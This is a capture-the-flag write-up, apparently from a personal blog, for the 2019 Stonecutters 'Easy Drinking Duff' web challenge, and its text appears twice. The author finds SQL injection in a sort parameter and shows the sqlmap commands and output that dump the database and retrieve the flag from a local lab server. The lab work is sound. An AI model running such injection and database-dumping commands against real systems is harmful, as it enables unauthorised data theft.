2019 Stonecutters - Easy Drinking Duff
Easy Drinking Duff was the first and easiest web app challenge that the Stonecutters had on the board. By the time I got around to it, it was only worth 75 points and it had the most solves of all the web app challenges.
In order to access the challenge, I needed to register my SSH key with the scoring server and run a provided SSH command to access the challenge. I was then able to load the following site by pointing my browser to 127.0.0.1:8080:
This just screamed database, so I entered a ' at the end of year to see what would happen and I saw the following error message:
This indicated a SQLi vulnerability so I ran sqlmap, as seen below, to validate the finding by checking who the current-user was:
# sqlmap -u "127.0.0.1:8080/index.php?s=year*" --current-user
<snip>
[13:57:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[13:57:38] [INFO] fetching current user
[13:57:38] [INFO] retrieved: ctf@localhost
current user: 'ctf@localhost'
[13:57:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
As the injection vulnerability was confirmed, I then ran sqlmap again with the -a option so I could check for flags:
# sqlmap -u "127.0.0.1:8080/index.php?s=year*" -a
<snip>
[13:58:11] [INFO] retrieved: Artist Test
[13:58:11] [INFO] retrieved: 0
[13:58:11] [INFO] retrieved: flag{OttoMannWasHere}
<snip>
That was it for this challenge. I'm excited to share the rest of my write-ups when I'm allowed. Rumor has it that the Stonecutters will release new challenges relatively soon. This means I should get the green-light to post my other write-ups shortly thereafter.
Thanks for your patience!
The rest of the challenges can be found here:
https://blog.welcomethrill.house/2019/01/code-name-2019-stonecutters-ctf.html
-strupo_
In order to access the challenge, I needed to register my SSH key with the scoring server and run a provided SSH command to access the challenge. I was then able to load the following site by pointing my browser to 127.0.0.1:8080:
Easy Drinking Duff
I then sorted the data set by year by clicking on the "Year" column header which sent a request for: http://127.0.0.1:8080/index.php?s=year
This just screamed database, so I entered a ' at the end of year to see what would happen and I saw the following error message:
SQL Error
This indicated a SQLi vulnerability so I ran sqlmap, as seen below, to validate the finding by checking who the current-user was:
# sqlmap -u "127.0.0.1:8080/index.php?s=year*" --current-user
<snip>
[13:57:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[13:57:38] [INFO] fetching current user
[13:57:38] [INFO] retrieved: ctf@localhost
current user: 'ctf@localhost'
[13:57:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
As the injection vulnerability was confirmed, I then ran sqlmap again with the -a option so I could check for flags:
# sqlmap -u "127.0.0.1:8080/index.php?s=year*" -a
<snip>
[13:58:11] [INFO] retrieved: Artist Test
[13:58:11] [INFO] retrieved: 0
[13:58:11] [INFO] retrieved: flag{OttoMannWasHere}
<snip>
That was it for this challenge. I'm excited to share the rest of my write-ups when I'm allowed. Rumor has it that the Stonecutters will release new challenges relatively soon. This means I should get the green-light to post my other write-ups shortly thereafter.
Thanks for your patience!
The rest of the challenges can be found here:
https://blog.welcomethrill.house/2019/01/code-name-2019-stonecutters-ctf.html
-strupo_
